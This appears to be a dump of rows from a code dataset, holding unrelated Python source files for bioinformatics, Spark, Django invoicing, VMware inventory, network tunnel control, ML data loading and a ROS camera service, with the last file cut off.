index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
996,100 | b3a71432e52c46031eb92b0ce55955d09b59b760 | import argparse
import string
from pyfasta import Fasta
from odetta.gff.feature import Feature
from odetta.gff.tree import build_tree
parser = argparse.ArgumentParser(description='TODO')
parser.add_argument('genome', help='TODO')
parser.add_argument('gff')
complements = string.maketrans('ATCGN', 'TAGCN')
def reverse_complement(seq):
return seq.translate(complements)[::-1]
def genome_seq(genome, feature):
seq = genome[feature.seqid][feature.start - 1:feature.end]
if feature.strand == '-':
return reverse_complement(seq)
else:
return seq
def chunks(l, n):
""" Yield successive n-sized chunks from l.
"""
for i in xrange(0, len(l), n):
yield l[i:i+n]
def fasta_rec(ID, seq):
header = '>{}'.format(ID)
return '\n'.join([header] + list(chunks(seq, 70)))
if __name__ == '__main__':
args = parser.parse_args()
genome = Fasta(args.genome)
chromosomes, genes, transcripts = build_tree(Feature.from_file(args.gff))
for transcript in transcripts.values():
exons = [x for x in transcript.children if x.type == 'exon']
# handle an ugly GFF case: a transcript might not have exons explicitly defined,
# so we're assuming it's implied
# TODO this would fit better in a "clean GFF" script
if len(exons) == 0:
exons = [transcript]
reverse = transcript.strand == '-'
seq = ''
for exon in sorted(exons, key=lambda e: e.start, reverse=reverse):
seq += genome_seq(genome, exon)
print fasta_rec(transcript.ID, seq)
|
996,101 | 6e1acaa13b9cb88015a3ca9ed7e47fa4653f49fa | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 7 16:49:32 2017
@author: hxr
"""
from pyspark import SparkContext
import re
# remove any non-words and split lines into separate words
# finally, convert all words to lowercase
def splitter(line):
line = re.sub(r'^\W+|\W+$', '', line)
return map(str.lower, re.split(r'\W+', line))
if __name__ == '__main__':
# configuration
sc = SparkContext("local", "distinct_wordcount")
# input the file
text = sc.textFile('pg2701.txt')
# using flatMap method to apply splitter function to all elements
words = text.flatMap(splitter)
# for the same word, we only keep one and remove others
words_distinct = words.distinct()
# count distinct words
counts = words_distinct.count()
print("distinct words:",counts)
|
996,102 | 19b8bc2291df76bf22ac7b25d21bdba1c08aa0a2 | from django.contrib.auth.decorators import login_required,user_passes_test,permission_required
from forms import *
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render_to_response,redirect,get_object_or_404
from django.template import RequestContext
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.forms.models import modelformset_factory,inlineformset_factory
#from django.db.models import Q
from django.http import HttpResponse
from django.http import JsonResponse
from django.db.models import Avg,Sum,Count,F,FloatField,Q
from decimal import *
from comunes import *
#import simplejson
import json
from django.core.serializers.json import DjangoJSONEncoder
from django.utils.safestring import SafeString
@login_required(login_url='/login/')
@user_passes_test(is_in_factura_group, login_url='/login/')
def index_factura(request):
form_class = GenericSearchForm
model = Documento
template_name = 'index_factura.html'
if request.method == 'POST':
form = form_class(request.POST or None)
if form.is_valid():
#factura_list = model.objects.filter(correlativo__icontains=form.cleaned_data['buscar'])
factura_list = model.objects.filter(Q(tipo_doc__codigo='FV') & \
(Q(correlativo__contains=form.cleaned_data['buscar']) |\
Q(cliente__razon_social__contains=form.cleaned_data['buscar']))
)
else:
#factura_list = model.objects.all()
factura_list = model.objects.filter(Q(tipo_doc__codigo='FV') )
form = GenericSearchForm()
factura_list=factura_list.annotate(sub_total=( Sum( F('documentodet__total') ) ) )
factura_list=factura_list.annotate(iva=( Sum( F('documentodet__total') ) ) )
paginator = Paginator(factura_list, 11) # Show 10 contacts per page
page = request.GET.get('page')
try:
facturas = paginator.page(page)
except PageNotAnInteger:
facturas = paginator.page(1)
except EmptyPage:
facturas = paginator.page(paginator.num_pages)
return render_to_response(template_name,
{'form': form, 'facturas': facturas,},
context_instance=RequestContext(request))
@login_required(login_url='/login/')
@permission_required('ventas.add_documento', login_url='/login/')
def add_factura(request):
template_name="factura.html"
if request.method == 'POST':
form = ManageFacturas(request.POST,request.FILES)
if form.is_valid():
fact_nueva = form.save(commit=False)
fact_nueva.correlativo=get_new_correlativo('FV')
fact_nueva.usuario=request.user
tipodoc = TipoDoc(codigo='FV')
fact_nueva.tipo_doc=tipodoc.id
fact_nueva.save()
messages.add_message(request, messages.SUCCESS, ('Operacion exitosa'))
# If the save was successful, redirect to another page
return HttpResponseRedirect('/detalle/%s' % fact_nueva.pk)
else:
form = ManageFacturas()
return render_to_response(template_name,
{'form': form},
context_instance=RequestContext(request))
@login_required(login_url='/login/')
@permission_required('ventas.add_documento', login_url='/login/')
def detalle(request,pk):
factura = get_object_or_404(Documento, pk=pk)
#form = ManageDocumentos(instance=documento)
form_class = GenericSearchForm
model = DocumentoDet
if request.method == 'POST':
form = ManageLineas(request.POST,request.FILES)
if form.is_valid():
nueva = form.save(commit=False)
nueva.documento=factura
a=nueva.save()
data,data_json=get_data_detalle(pk)
#actualizo la data de factura
for dt in data:
setattr(factura, dt, data[dt])
factura.save()
messages.add_message(request, messages.SUCCESS, ('Operacion exitosa'))
# If the save was successful, redirect to another page
return HttpResponseRedirect('/detalle/%s' % pk)
else:
form = ManageLineas(instance=factura)
lineas = model.objects.filter(documento=pk)
data,data_json=get_data_detalle(pk)
return render_to_response('detalle.html',
{'form': form,'id': pk,'factura':factura,'lineas':lineas,'data':data,'data_json':SafeString(data_json)},
context_instance=RequestContext(request))
@permission_required('ventas.delete_documento', login_url='/login/')
def delete_detalle(request,pk,fact):
#linea a borrar
linea = get_object_or_404(DocumentoDet, pk=pk)
factura = get_object_or_404(Documento, pk=fact)
#borro linea
linea.delete()
#nuevas lineas de la factura para recalcular
data,data_json=get_data_detalle(fact)
#actualizo la data de factura con la nueva info de lineas
for dt in data:
setattr(factura, dt, data[dt])
factura.save()
messages.add_message(request, messages.SUCCESS, ('linea eliminada'))
return HttpResponseRedirect('/detalle/%s' % fact)
@login_required(login_url='/login/')
@permission_required('ventas.change_documento', login_url='/login/')
def edit_factura(request,pk):
factura = get_object_or_404(Documento, pk=pk)
form = ManageFacturas(instance=factura)
#print form.nombres
if request.POST:
form = ManageFacturas(request.POST,request.FILES,instance=factura)
if form.is_valid():
form.save()
messages.add_message(request, messages.SUCCESS, ('factura editada.'))
return HttpResponseRedirect('/detalle/%s' % pk)
return render_to_response('factura.html',
{'form': form,
'id': pk},
context_instance=RequestContext(request))
@login_required(login_url='/login/')
@permission_required('ventas.delete_documento', login_url='/login/')
def delete_factura(request,pk):
factura = get_object_or_404(Documento, pk=pk)
form = ManageFacturas(instance=factura)
if request.POST:
form = ManageFacturas(request.POST,request.FILES,instance=factura)
if form.is_valid():
factura.delete()
messages.add_message(request, messages.SUCCESS, ('Factura eliminada'))
return HttpResponseRedirect('/factura/')
return render_to_response('factura.html',
{'form': form,
'id': pk},
context_instance=RequestContext(request))
|
996,103 | 4f8d19cf6629c6b33875a0d9a1ded9cb7eb94bca | import plotly.graph_objects as go
fig = go.Figure(
go.Waterfall(
name="2018",
orientation="h",
measure=[
"relative",
"relative",
"relative",
"relative",
"relative",
"relative",
"relative",
],
y=[
x[1]
for x in [
["Выпуск", "Output (X)"],
["Импорт", "Import (IM)"],
["Статистическое расхождение", "Statistical discrepancy"],
["Экспорт", "Export (EX)"],
["Инвестиции", "Investment (I)"],
["Конечное потребление", "Final consumption (C)"],
["Промежуточное потребление", "Intermediate consumption (AX)"],
]
],
x=[196.6, 21.6, -0.6, -31.9, -23.6, -69.3, -92.7],
connector={
"mode": "between",
"line": {"width": 2, "color": "rgb(0, 0, 0)", "dash": "solid"},
},
)
)
# "Национальные счета, РФ, 2018, млрд.руб."
fig.update_layout(title="Goods and services account (Russia, 2018, trn rub)")
fig.write_html("handout/res_use.html", auto_open=True)
fig.show()
|
996,104 | e005a42e0a66c4b1421a009fc0c8f8ac6a1e846d | import atexit
import ssl
import json
import requests
from pyVim import connect
from pyVmomi import vim, vmodl
from argparse import ArgumentParser
import os
from com.vmware.vapi.std_client import DynamicID
from vmware.vapi.vsphere.client import create_vsphere_client
class HostList:
def __init__(self, output_filename):
self.hosts = []
self.output_filename = output_filename
def add_host(self, host):
if not self.host_exists(host.hostname):
self.hosts.append(host)
def host_exists(self, uuid):
for host in self.hosts:
if host.uuid == uuid:
return True
return False
def prometheus_output(self):
output = []
for host in self.hosts:
x = {
"targets": [host.hostname],
"labels" : host.tags
}
output.append(x)
if os.path.exists(self.output_filename):
os.remove(self.output_filename)
with open(self.output_filename, 'w') as f:
json.dump(output, f)
class Host:
def __init__(self, uuid, hostname, ip_address):
self.hostname = hostname
self.ip_address = ip_address
self.uuid = uuid
self.tags = {}
self.tags["address"] = ip_address
self.tags["uuid"] = uuid
def add_values(self, key, value):
print(f"Adding value to {self.hostname} key: {key} value: {value}")
self.tags[key] = value
def get_hostname(self):
return self.hostname
class VMwareInventory:
def __init__(self, hostname, username, password, port, output_filename, validate_certs, with_tags):
self.hostname = hostname
self.username = username
self.password = password
self.port = port
self.with_tags = with_tags
self.validate_certs = validate_certs
self.content = None
self.rest_content = None
self.hostlist = HostList(output_filename)
def _login(self):
"""
Login to vCenter or ESXi server
Returns: connection object
"""
if self.validate_certs and not hasattr(ssl, 'SSLContext'):
raise Exception('pyVim does not support changing verification mode with python < 2.7.9. Either update '
'python or set validate_certs to false in configuration YAML file.')
ssl_context = None
if not self.validate_certs and hasattr(ssl, 'SSLContext'):
ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_context.verify_mode = ssl.CERT_NONE
service_instance = None
try:
service_instance = connect.SmartConnect(host=self.hostname, user=self.username,
pwd=self.password, sslContext=ssl_context,
port=self.port)
except vim.fault.InvalidLogin as e:
raise Exception("Unable to log on to vCenter or ESXi API at %s:%s as %s: %s" % (
self.hostname, self.port, self.username, e.msg))
except vim.fault.NoPermission as e:
raise Exception("User %s does not have required permission"
" to log on to vCenter or ESXi API at %s:%s : %s" % (self.username, self.hostname, self.port, e.msg))
except (requests.ConnectionError, ssl.SSLError) as e:
raise Exception("Unable to connect to vCenter or ESXi API at %s on TCP/%s: %s" %
(self.hostname, self.port, e))
except vmodl.fault.InvalidRequest as e:
# Request is malformed
raise Exception("Failed to get a response from server %s:%s as "
"request is malformed: %s" % (self.hostname, self.port, e.msg))
except Exception as e:
raise Exception("Unknown error while connecting to vCenter or ESXi API at %s:%s : %s" % (
self.hostname, self.port, e))
if service_instance is None:
raise Exception("Unknown error while connecting to vCenter or ESXi API at %s:%s" % (
self.hostname, self.port))
atexit.register(connect.Disconnect, service_instance)
return service_instance.RetrieveContent()
def do_login(self):
"""
Check requirements and do login
"""
self.content = self._login()
if self.with_tags:
self.rest_content = self._login_vapi()
def _login_vapi(self):
"""
Login to vCenter API using REST call
Returns: connection object
"""
session = requests.Session()
session.verify = self.validate_certs
if not self.validate_certs:
# Disable warning shown at stdout
requests.packages.urllib3.disable_warnings()
print("logging in")
client = create_vsphere_client(server=self.hostname,
username=self.username,
password=self.password,
session=session)
if client is None:
raise Exception("Failed to login to %s using %s" %
(self.hostname, self.username))
return client
def _get_managed_objects_properties(self, vim_type, properties=None):
"""
Look up a Managed Object Reference in vCenter / ESXi Environment
:param vim_type: Type of vim object e.g, for datacenter - vim.Datacenter
:param properties: List of properties related to vim object e.g. Name
:return: local content object
"""
# Get Root Folder
root_folder = self.content.rootFolder
if properties is None:
properties = ['name']
# Create Container View with default root folder
mor = self.content.viewManager.CreateContainerView(
root_folder, [vim_type], True)
# Create Traversal spec
traversal_spec = vmodl.query.PropertyCollector.TraversalSpec(
name="traversal_spec",
path='view',
skip=False,
type=vim.view.ContainerView
)
# Create Property Spec
property_spec = vmodl.query.PropertyCollector.PropertySpec(
type=vim_type, # Type of object to retrieved
all=False,
pathSet=properties
)
# Create Object Spec
object_spec = vmodl.query.PropertyCollector.ObjectSpec(
obj=mor,
skip=True,
selectSet=[traversal_spec]
)
# Create Filter Spec
filter_spec = vmodl.query.PropertyCollector.FilterSpec(
objectSet=[object_spec],
propSet=[property_spec],
reportMissingObjectsInResults=False
)
return self.content.propertyCollector.RetrieveContents([filter_spec])
def _get_object_prop(self, vm, attributes):
"""Safely get a property or return None"""
result = vm
for attribute in attributes:
try:
result = getattr(result, attribute)
except (AttributeError, IndexError):
return None
return result
def populate(self):
objects = self._get_managed_objects_properties(vim_type=vim.VirtualMachine,
properties=['name'])
tag_svc = self.rest_content.tagging.Tag
tag_association = self.rest_content.tagging.TagAssociation
cat_svc = self.rest_content.tagging.Category
# Get tags and categories to lower amount of api requests needed
cat_info = dict()
tags_info = dict()
tags = tag_svc.list()
cats = cat_svc.list()
for cat in cats:
cat_obj = cat_svc.get(cat)
cat_info[cat_obj.id] = cat_obj.name
for tag in tags:
tag_obj = tag_svc.get(tag)
tags_info[tag_obj.id] = dict(name=tag_obj.name,category=cat_info[tag_obj.category_id])
for vm_obj in objects:
for vm_obj_property in vm_obj.propSet:
# VMware does not provide a way to uniquely identify VM by its name
# i.e. there can be two virtual machines with same name
# Appending "_" and VMware UUID to make it unique
if not vm_obj.obj.config:
# Sometime orphaned VMs return no configurations
continue
if not self.hostlist.host_exists(vm_obj.obj.config.uuid):
vm_mo_id = vm_obj.obj._GetMoId()
vm_dynamic_id = DynamicID(
type='VirtualMachine', id=vm_mo_id)
attached_tags = tag_association.list_attached_tags(
vm_dynamic_id)
if not vm_obj.obj.guest or not vm_obj.obj.guest.ipAddress:
continue
host_ip = vm_obj.obj.guest.ipAddress
if host_ip is None:
continue
current_host = Host(
vm_obj.obj.config.uuid, vm_obj_property.val, host_ip)
for tag_id in attached_tags:
current_host.add_values(tags_info[tag_id]['category'], tags_info[tag_id]['name'])
self.hostlist.add_host(current_host)
return
def main():
parser = ArgumentParser()
parser.add_argument("-o", "--hostname", dest="hostname",
help="vsphere hostname")
parser.add_argument("-u", "--username",
dest="username",
help="vsphere username")
parser.add_argument("-p", "--password",
dest="password",
help="vsphere password")
parser.add_argument("-f", "--file", dest="filename",
help="write report to FILE", metavar="FILE")
parser.add_argument("-l", "--loop", dest="loop",
help="loop over and over", action='store_true')
args = parser.parse_args()
while True:
vmware = VMwareInventory(args.hostname, args.username, args.password, "443", args.filename, False, True)
vmware.do_login()
vmware.populate()
vmware.hostlist.prometheus_output()
if args.loop == False:
break
if __name__ == '__main__':
main() |
996,105 | bd51b057e248b5ee6fd9d4c0b3185e703e341b7a | import torch.nn as nn
import torch.nn.functional as F
import torch
import numpy as np
from enum import IntEnum
class Action(IntEnum):
BUY = 0
SELL = 1
HOLD = 2
# You need to include any network definitions
class TraderNetwork(nn.Module):
def __init__(self, row_size):
super(TraderNetwork, self).__init__()
self.size = row_size
self.fc1 = nn.Linear(row_size, row_size*2)
self.fc2 = nn.Linear(row_size*2, row_size)
self.fc3 = nn.Linear(row_size, 3)
def forward(self, t):
# Have the tensor "flow" through the network
t = F.relu(self.fc1(t))
t = F.relu(self.fc2(t))
t = F.relu(self.fc3(t))
return t
class Agent:
def __init__(self, row_size):
"""
Write your custom initialization sequence here.
This can include loading models from file.
"""
self.tn = TraderNetwork(row_size).double()
self.tn.load_state_dict(torch.load("./submission/example_model.pt"))
self.tn.eval()
def step(self, row):
"""
Make a decision to be executed @ the open of the next timestep.
row is a numpy array with the same format as the training data
Return a tuple (Action, fraction). Fraction means different
things for different actions...
Action.BUY: represents fraction of cash to spend on purchase
Action.SELL: represents fraction of owned shares to sell
Action.HOLD: value ignored.
See the code below on how to return
"""
t = torch.tensor(row)
choice = torch.argmax(self.tn(t).squeeze(0)).item()
# The plan was to never have to use constants...
# Yeah, we're assuming consistency in buy=0, sell=1, and hold=2
if choice == 0:
return (Action.BUY, 1)
elif choice == 1:
return (Action.SELL, 1)
return (Action.HOLD, 0) |
996,106 | 6cf2fc79e7287ab6aa2ebf9f27c58381ac90f129 | # GENERATED BY KOMAND SDK - DO NOT EDIT
import insightconnect_plugin_runtime
import json
class Component:
DESCRIPTION = "Shows when a domain, IP or URL was given attribution of a particular security categorization or threat type (indicators of compromise)"
class Input:
NAME = "name"
class Output:
TIMELINE = "timeline"
class TimelineInput(insightconnect_plugin_runtime.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"name": {
"type": "string",
"title": "Name",
"description": "Domain name, IP address or URL",
"order": 1
}
},
"required": [
"name"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class TimelineOutput(insightconnect_plugin_runtime.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"timeline": {
"type": "array",
"title": "Timeline",
"description": "Provided data for a queried domain name, IP address or URL",
"items": {
"$ref": "#/definitions/timeline"
},
"order": 1
}
},
"required": [
"timeline"
],
"definitions": {
"timeline": {
"type": "object",
"title": "timeline",
"properties": {
"attacks": {
"type": "array",
"title": "Attacks",
"description": "Which named attacks, if any, matched the input",
"items": {
"type": "string"
},
"order": 2
},
"categories": {
"type": "array",
"title": "Categories",
"description": "Which Umbrella security category, if any, matched the input",
"items": {
"type": "string"
},
"order": 1
},
"threatTypes": {
"type": "array",
"title": "Threat Types",
"description": "Which threat type, if any, matched in the input",
"items": {
"type": "string"
},
"order": 3
},
"timestamp": {
"type": "integer",
"title": "Timestamp",
"description": "The time when the attribution for this domain or URL changed. This is given in epoch (unix) time stamps",
"order": 4
}
}
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
|
996,107 | 0c4ed9168ea21210e069b7cc6be4068f57830339 |
f=open("registrationnumber")
fout=open("validregnum","w")
regnum=set()
for numbers in f:
regnum.add(numbers.rstrip("\n"))
from re import *
rule='KL\d{2}[A-Z]{1,2}\d{1,4}'
for vehiclenum in regnum:
matcher=fullmatch(rule,vehiclenum)
if matcher!=None:
fout.write(vehiclenum+"\n")
else:
pass |
996,108 | 3d9f522b3ca7de476dcc4c1eb99257a80d433f92 | class Solution:
def longestSubsequence(self, num: List[int], diff: int) -> int:
ans = {}
for i in num:
ans[i] = ans.get(i - diff, 0) + 1
return max(ans.values())
|
996,109 | dd510799959e92cca747645259e1926cd0387ca7 | """
This module implements an TunnelController
Set encap/decap rules for ipv4/bier
"""
from libs.core.Log import Log
from libs.core.CLI import CLI
from libs.controller.BierController import BierComputation
from libs.GroupManager import GroupManager
from libs.core.Event import Event
from operator import ior
from libs.controller.TopologyController import TopologyController
from libs.TopologyManager import TopologyManager
from libs.Configuration import Configuration
from libs.TableEntryManager import TableEntryManager, TableEntry
from networkx import NodeNotFound
class TunnelController(object):
def __init__(self, base):
"""
Init Tunnelcontroller with base controller and add cli commands
:param base: basecontroller
:param type: Sets bier or bier-te type
"""
self._baseController = base
Event.on("group_update", self.update_based_on_group)
Event.on("topology_change", self.update_based_on_topology)
# add decap rules for devices
Event.on("switch_connected", self.add_ipv4_decap_rule)
self.table_manager = TableEntryManager(controller=base, name="TunnelController")
self.table_manager.init_table("ingress.tunnel_c.decap_bier")
self.table_manager.init_table("ingress.tunnel_c.decap_ipv4")
self.table_manager.init_table("egress.tunnel_c.encap_ipv4")
##########################################################
# #
# BIER encap /vdecap section #
# #
##########################################################
def update_bier_encap_entry(self, switch=None):
"""
Add bier encap entry for given prefix
:param switch: switch where rules should be installed
:return:
"""
valid_entries = []
for mc_addr in GroupManager.get_mc_addresses():
for domain in GroupManager.get_domains_for_mc_addr(mc_addr):
domain = int(domain)
bitstring = BierComputation.compute_bier_header(mc_addr=mc_addr, domain=domain)
type = 0xBB00
entry = TableEntry(switch=switch,
match_fields={
"hdr.ipv4.dstAddr": mc_addr,
},
action_name="egress.tunnel_c.add_bier",
action_params={
"bs": bitstring,
"etherType": type,
"domain": domain
})
if TableEntryManager.handle_table_entry(manager=self.table_manager,
table_name="egress.tunnel_c.encap_ipv4",
table_entry=entry):
Log.async_debug("Installed encap ipv4 rule for", switch, mc_addr, bitstring)
valid_entries.append(entry.match_fields)
self.table_manager.remove_invalid_entries(switch=switch,
table_name="egress.tunnel_c.encap_ipv4",
valid_entries=valid_entries)
def update_bier_decap_rule(self, switch=None):
"""
Updates the bier decap rules based on the current topology
:param switch: switch where decap rules should be installed
:return:
"""
valid_entries = []
# bier decap rules
for domain in TopologyManager.get_domain_for_device(switch):
domain = int(domain)
bfr_id = BierComputation.id_to_bitstring(TopologyManager.get_device(switch).get_bfr_id(domain))
entry = TableEntry(switch=switch,
match_fields={
"hdr.bier[0].BitString": (bfr_id, bfr_id),
"hdr.bier[0].Domain": domain
},
action_name="ingress.tunnel_c.bier_decap",
action_params={
"decapBit": bfr_id
},
priority=1)
if TableEntryManager.handle_table_entry(manager=self.table_manager,
table_name="ingress.tunnel_c.decap_bier",
table_entry=entry):
Log.async_debug("BIER decap rule updated on", switch, "for domain", domain)
valid_entries.append(entry.match_fields)
self.table_manager.remove_invalid_entries(switch=switch,
table_name="ingress.tunnel_c.decap_bier",
valid_entries=valid_entries)
#############################################################
# Event Listener #
#############################################################
def add_ipv4_decap_rule(self, *args, **kwargs):
"""
Adds an ipv4 decap rule for the switch
This event is triggered when a switch is arbitrated
:return:
"""
device = TopologyManager.get_device(kwargs.get('name'))
entry = TableEntry(switch=device.get_name(),
match_fields={"hdr.ipv4.dstAddr": device.get_ip()},
action_name="ingress.tunnel_c.ipv4_decap")
if TableEntryManager.handle_table_entry(manager=self.table_manager,
table_name="ingress.tunnel_c.decap_ipv4",
table_entry=entry):
Log.async_debug("Ipv4 decap rule installed for", kwargs.get('name'))
def update_based_on_topology(self, *args, **kwargs):
"""
Run an update based on a topology change
In this casae the bier decap rules have to be adjusted
because a switch may now be in a different domain
:return:
"""
for bfr in Configuration.get("switches"):
switch = bfr["name"]
self.update_bier_decap_rule(switch=switch)
def update_based_on_group(self, *args, **kwargs):
"""
Updates tunnel rules
:return:
"""
for bfr in Configuration.get("switches"):
# only update BFIRs
if not bfr["ingress"]:
continue
self.update_bier_encap_entry(switch=bfr["name"])
|
996,110 | 811866bb1a46c055559fe2ff3dec4ec01329d00f | # -*- coding: utf-8 -*-
# Django
from django.views import View
from django.shortcuts import render
# Third Parties
from rest_framework import viewsets
# Project
from entbook.companies.models import Company
from entbook.companies.serializers import CompanySerializer
class CompanyViewSet(viewsets.ModelViewSet):
queryset = Company.objects.all()
serializer_class = CompanySerializer
class CompanyListAndCreateView(View):
template = "companies/list_and_create.html"
def get(self, request):
return render(request, self.template)
|
996,111 | 0af97e2f05394e685a8d2127479c913694d02c51 | from __future__ import unicode_literals
from django.db import models
from db.paranoia import ParanoidModel
class Post(ParanoidModel):
title = models.CharField(max_length=255)
description = models.CharField(max_length=500)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Comment(ParanoidModel):
text = models.TextField(null=True)
post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name='post_comments')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
|
996,112 | 25e1f9e98edf446090014b2cb7f633089b653f82 | '''
Collection of functions to test the stats functions
'''
from app.stats import ptest
from numpy.random import normal, uniform
import numpy as np
np.random.seed(42)
def _test_normality():
'''
Method to test the _check_normality function
'''
size = 100
dist = normal(loc = 0, scale = 1, size = size)
assert ptest._check_normality(dist) == True, "The input distribution is gaussian."
dist = uniform(low = -1, high=1, size=size)
assert ptest._check_normality(dist) == False, "The input distribution is not gaussian."
def _test_guassian_comparison():
'''
Method to test the _comparE_gaussian function
'''
size = 100
dist1 = normal(loc=0, scale=1, size=size)
dist2 = normal(loc=0.1, scale=0.9, size=size)
assert ptest._compare_gaussians(dist1, dist2) == True, "The input distributions are similar."
dist2 = normal(loc=5, scale=1, size=size)
assert ptest._compare_gaussians(dist1, dist2) == False, "The input distributions are not similar."
dist2 = normal(loc=5, scale=5, size=size)
assert ptest._compare_gaussians(dist1, dist2) == False, "The input distributions are not similar."
def _test_distribution_comparison():
'''
Method to test the _comparE_gaussian function
'''
size = 100
dist1 = normal(loc=0, scale=1, size=size)
dist2 = normal(loc=0.1, scale=0.9, size=size)
assert ptest._compare_distributions(dist1, dist2) == True, "The input distributions are similar."
dist2 = uniform(low=-1, high=-1, size=size)
assert ptest._compare_gaussians(dist1, dist2) == False, "The input distributions are not similar."
if __name__ == "__main__":
_test_normality()
_test_guassian_comparison()
_test_distribution_comparison() |
996,113 | 9971bf3ae9c3307af31d7174703dea5dfd54e23c | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2019 EMBL - European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.http import Http404
from django.db.models import Q
from django.shortcuts import get_object_or_404
from mongoengine.base.datastructures import EmbeddedDocumentList
from emgapi import models as emg_models
class AnalysisJobAnnotationMixin:
"""Analysis Job Annotation Mixin.
This mixin povides a basic get_queryset that will get an AnalysisJobAnnotation
and will return the defined property from the Mongo model (annotation_model)
Usage:
`annotation_model`: class to be used (the mongo model)
`annotation_model_property`: field within the class to get the data
`analysis_job_filters`: an Q object to use to filter the AnalysisJob query
"""
annotation_model = None
annotation_model_property = None
analysis_job_filters = None
def get_queryset(self):
"""Get the AnalysisJob Annotation corresponding property from Mongo.
"""
acc = self.kwargs['accession'].lstrip('MGYA')
job_query = Q(pk=acc)
if self.analysis_job_filters:
job_query &= self.analysis_job_filters
job = get_object_or_404(emg_models.AnalysisJob, job_query)
analysis = None
try:
analysis = self.annotation_model.objects \
.get(analysis_id=str(job.job_id))
except self.annotation_model.DoesNotExist:
# Return an empty EmbeddedDocumentList, the entity exists
# but it doesn't have annotations
return EmbeddedDocumentList([], self.annotation_model, self.annotation_model_property)
if hasattr(self, "annotation_model_property_resolver"):
return self.annotation_model_property_resolver(analysis)
return getattr(analysis, self.annotation_model_property)
class AnnotationRetrivalMixin:
"""Basic annotation retrival mixin
"""
annotation_model = None
def get_queryset(self):
return self.annotation_model.objects.all()
def get_object(self):
try:
accession = self.kwargs[self.lookup_field]
return self.annotation_model.objects.get(accession=accession)
except KeyError:
raise Http404(("Attribute error '%s'." % self.lookup_field))
except self.annotation_model.DoesNotExist:
raise Http404(('No %s matches the given query.' %
self.annotation_model.__class__.__name__))
|
996,114 | 0a39e3547f1ef16c32e7cabc44781ef6b833b258 | from keras.utils import to_categorical
import numpy as np
import os
import h5py
from matplotlib import pyplot as plt
from sklearn.preprocessing import MinMaxScaler
class Dataset_MedData:
def __init__(self, config):
self.config = config
self.create_data()
def create_data(self):
#specify path and import first dataset
contents = os.listdir(self.config["input_path"])
filename_test = self.config["input_path"] + contents[0]
filename_training = self.config["input_path"] + contents[1]
with h5py.File(filename_training, 'r') as file:
self.training_CT = np.array(file.get('CT'))
self.training_PET = np.array(file.get('PET'))
with h5py.File(filename_test, 'r') as file:
self.test_CT = np.array(file.get('CT'))
self.test_PET = np.array(file.get('PET'))
self.train_data = self.training_CT
self.train_labels = self.training_PET
self.test_data = self.test_CT
self.test_labels = self.test_PET
# #scale training and test data to a specific range
# if self.config["scaling"] == True:
# max_val = 1
# self.train_data, self.test_data = self.scaleToRange(self.train_data, self.test_data, (0,max_val))
#
# Find the shape of input images and create the variable input_shape
self.train_data = self.adaptDimensions(dataset=self.train_data)
self.train_labels = self.adaptDimensions(dataset=self.train_labels)
self.test_data = self.adaptDimensions(dataset=self.test_data)
self.test_labels = self.adaptDimensions(dataset=self.test_labels)
# #reduce training set
# ratio = 0.05
# self.train_data = self.train_data[:int(np.floor(ratio*len(self.train_data)))]
# self.train_labels = self.train_labels[:int(np.floor(ratio*len(self.train_labels)))]
# self.test_data = self.test_data[:int(np.floor(ratio*len(self.test_data)))]
# self.test_labels = self.test_labels[:int(np.floor(ratio*len(self.test_labels)))]
# #to be deleted later
# train_data = self.train_data
# train_labels = self.train_labels
# test_data = self.test_data
## test_labels = self.test_labels
print('Preprocessing finished.')
def adaptDimensions(self, dataset, ndims=1):
dataset_shaped = dataset.reshape(dataset.shape[0], dataset.shape[1], dataset.shape[2], dataset.shape[3], ndims)
return dataset_shaped
def performMeanSubtraction(self, train_data, test_data):
#calculate the mean image of train_data set:
current_mean = np.mean(train_data, axis=0)
#subtract this mean from both train_data and test_data
train_data_meanSub = train_data - current_mean
test_data_meanSub = test_data - current_mean
return train_data_meanSub, test_data_meanSub
|
996,115 | 9a4f6fbdbad7dc21852a890f7606c733fc693281 | #!/usr/bin/env python3
# a class that
import rospy
from my_robot_tutorial.srv import TurnCamera, TurnCameraResponse
import numpy as np
import os
import cv2
from cv_bridge import CvBridge
class TurnCameraClass:
"""TurnCameraClass ummary.
Attributes
----------
available_angles : type
Description of attribute `available_angles`.
ros_service : type
Description of attribute `ros_service`.
send_image : type
Description of attribute `send_image`.
"""
def __init__(self):
"""__init__ summary.
Initialising the avaialable parameters for the camera
"""
self.available_angles = [-30, -15, 0, 15, 30]
self.ros_service = rospy.Service("turn_camera", TurnCamera, self.send_image)
def read_in_image_by_file_name(self, file_name):
"""read_in_image_by_file_name summary.
Parameters
----------
file_name : type
Description of parameter `file_name`.
Returns
-------
type
Description of returned object.
"""
dir_name = os.path.dirname(__file__)
file_location = dir_name + "/Images/" + file_name
image = cv2.imread(file_location)
return image
def get_image(self, angle):
"""get_image summary.
Parameters
----------
angle : type
Description of parameter `angle`.
Returns
-------
type
Description of returned object.
"""
closest_angle = min(self.available_angles, key=lambda x:abs(x-angle))
return self.read_in_image_by_file_name(str(closest_angle) + ".png")
def send_image(self, req):
"""send_image summary.
Parameters
----------
req : type
Description of parameter `req`.
Returns
-------
type
Description of returned object.
"""
